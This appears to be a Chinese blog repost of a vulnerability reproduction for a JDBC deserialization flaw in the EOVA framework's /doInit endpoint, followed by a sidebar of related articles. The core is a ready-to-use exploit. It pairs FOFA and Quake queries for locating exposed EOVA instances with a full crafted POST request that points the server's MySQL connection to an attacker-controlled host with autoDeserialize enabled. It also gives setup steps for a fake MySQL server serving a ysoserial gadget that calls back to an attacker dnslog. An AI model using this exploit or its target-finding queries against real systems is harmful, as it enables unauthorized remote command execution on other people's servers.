【EOVA】doInit接口反序列化漏洞

于 2024-09-14 23:15:04 发布
阅读量42 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzUxMTk4OTA1NQ==&mid=2247483992&idx=1&sn=457b7f9cdd62b8bb7a0267addd03797a&chksm=f96a0608ce1d8f1e2732fc3f56242fd76602ca8535ec0edec3b1b823349d44dfbbf38317cc0b&token=238205314&lang=zh_CN#rd
版权

原文链接:【EOVA】doInit接口反序列化漏洞

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。

漏洞简介 

EOVA是一个基于JFinal开发平台的快速开发框架,旨在提供高效、易用的开发工具和组件,以简化开发过程。其设计理念是“简单才是高科技”,强调通过简化开发流程来提高效率,降低开发成本。EOVA存在JDBC反序列化漏洞,由于JDBC连接mysql服务器的时候,参数完全可控,可传入恶意配置和恶意mysql服务器地址,导致反序列化漏洞。攻击者可利用该漏洞执行任意命令

漏洞信息

资产测绘

fofa: icon_hash="-1699356011"
Quake:favicon: "b697ab840454577e5837d5a8dd1b1acd"

风里雨里,我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦,地址 quake.360.net

图片

图片

漏洞复现

POST /doInit HTTP/1.1  
Host: xxx
Sec-Fetch-Dest: document  
Cache-Control: max-age=0  
Sec-Fetch-User: ?1  
Sec-Fetch-Site: none  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Accept-Language: zh-CN,zh;q=0.9  
Sec-Fetch-Mode: navigate  
Cookie: JSESSIONID=1diwaoe2lud2k1w5bzj9gy0r9v; _jfinal_captcha=ec1807bb391d443f9730b7b18384157a  
sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br, zstd  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded

ip=自己公网IP:端口%2Ftest%3FautoDeserialize=true%26statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%26user=URLDNS%26Yu9=Yu9%23&port=&username=root&password=123456

1、下载利用工具:https://github.com/fnmsd/MySQL_Fake_Server

2、修改配置文件:

ysoserialPath修改为自己的ysoserial-0.0.6-SNAPSHOT-all.jar文件路径

    "yso":{

     "URLDNS":["URLDNS","http://自己的dnslog地址"]  

    }

图片

3、然后启动:

图片

注意:默认的端口是3306,自己本地如果起了mysql可以关闭一下不然会冲突

4、发送请求

图片

图片

文章参考链接:奇安信攻防社区-EOVA未授权反序列化漏洞 (butian.net)

weixin_45597678
关注
专栏目录
Java反序列化(之)Mysql JDBC 反序列化分析
Vicl1fe的博客
02-19 767
前言 搞fastjson的时候又又又又又又遇到个经常听到但没研究过的链,就是Mysql JDBC反序列化,准备最近这段时间把它拿下。 Mysql Jdbc文件读取 首先加上我们的Mysql Jdbc环境 <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>8.0.13</ve
Eova&JFinal在阿里云K8S实现多环境自动化部署
zerovpp的博客
04-03 1230
JFinal&Eova在阿里云K8S实现多环境自动化部署
漏洞分析】反序列化漏洞
kali_Ma的博客
02-21 1025
0x01 背景 2022年1月18日,ORACLE官方发布了2022年第一季度的补丁,其中涉及到多个关于Weblogic的漏洞。由于Weblogic的补丁很贵,一般人下载不到,所以一直在等待相关的细节信息。 从CVE官网找到的CVE-2022-21350漏洞是属于Weblogic的未授权访问和拒绝服务漏洞,CVSS评分也只有6.5,和这里的反序列化似乎不是一个漏洞。从漏洞的简要描述来看这个漏洞似乎也不是CVE-2022-21306。 本篇文章主要是针对该漏洞的详细分析和研究,以探讨安全技术为目的,对漏洞分析
反序列化漏洞汇总
孤的博客
07-22 1448
转载于:https://blog.csdn.net/weixin_29324013/article/details/80901275 反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Ja...
java安全入门(三)——JDBC反序列化漏洞
weixin_45808483的博客
02-12 3145
对于使用java各种组件的项目,如果所使用的组件本身就存在漏洞,那么大部分实在因为在参数传递的时候收到了污染,而今天介绍的这一种,则是相对于在协议层面上的利用。 JDBC Java数据库连接,(Java Database Connectivity,简称JDBC)是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法 简单来说,你可以理解为 JDBC是封装好的数据库接口,你可以直接使用java调用该组件的接口,他把数据库的协议封装好了,让你无需对协议
eova(JFinal)项目一键式部署方法
zerovpp的博客
10-19 428
Eova发展到今天已经非常成熟了,可以实现一键式部署,简单来说: 1、用maven打包(mvn clean、mvn package); 2、找到生成的xxx.zip到服务器相关文件夹下解压; 3、运行部署命令(linux/mac):./eova.sh start 如果提示:baseUploadPath can not be blank错误,则是配置文件不正确,检查下default文件下的app.config是否正确。 ...
Eova项目嵌入前端页面介绍
weixin_43368664的博客
10-15 697
Eova官网中对嵌入前端的HTML、css、js,介绍的不是特别详细。因为项目需要,使用了简单开发的Eova框架。这里简单叙述在eova项目如何嵌入前端写的代码。 项目部署 可参照官方文档来http://doc.eova.cn/,这里就不详细介绍了。 在该系统中创建自定义业务 点击回车,刷新可以在综合业务中查看 然后查看数据库中的信息 接着在项目中自定义一个controller rend...
计算机术语eova,水龙弹の快速添加按钮
weixin_35529208的博客
07-05 247
![](https://box.kancloud.cn/39b87be9eeaed5a5c7510d565fe5cdc1_307x189.png)关于快速开发,市面上有很多解决方案,生成代码的尤其多如牛毛,所以很多开发者都或多或少接触过一些代码生成工具,所以形成了一些惯性思维,觉得只有生成代码才能灵活拓展功能和业务,实际上Eova除了基本的增删改查,也支持各种扩展。其中最具业务性的拓展就是自定义功...
EOVA的下拉级联实现过程
viewline007的博客
03-29 1049
EOVA的下拉级联实现过程Java大叔 QQ120454401.目标是在人员信息添加过程中实现通过下拉框来选取人员的地址信息。2.创建一个人员信息表,为了明确目标这个表中只有以下字段。create tableperson (id int(11) notnull auto_increment,name varchar(32)not null comment `人员姓名`,province int(1...
eova-eova-V1.6-beta6.zip
10-22
Eova,全称为Eova企业运营可视化平台,是一款专注于企业数据管理和分析的开源软件。它提供了强大的数据查询、报表设计以及可视化功能,帮助企业快速构建数据分析系统,提升业务决策效率。在"eova-eova-V1.6-beta6....
eova.rar_EOVA Intercpt_eova_eova_role_btn_eova开发社区_eova框架
09-20
"eova开发社区_eova框架" 表明这个压缩包可能包含了来自EOVA开发社区的资源,以及关于EOVA框架的详细资料。 **描述解析:** 描述中提到 "eova,一套jfinal开发框架,方便学习与开发",这表明EOVA是一个基于JFinal...
eova.zip_eova_eova sql_eova 怎么用_eova框架_site:www.pudn.com
09-21
Eova提供了一套便捷的DAO接口,开发者可以通过这些接口执行增删改查等基本操作,同时支持复杂的SQL语句编写。此外,Eova还提供了缓存机制,可以优化对数据库的访问效率。 五、Eova的权限管理 Eova内置了完善的权限...
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 866
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1015
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 361
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1615
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
企业如何构建有效的数据泄露防护安全体系
最新发布
A526847的博客
09-14 403
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 372
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值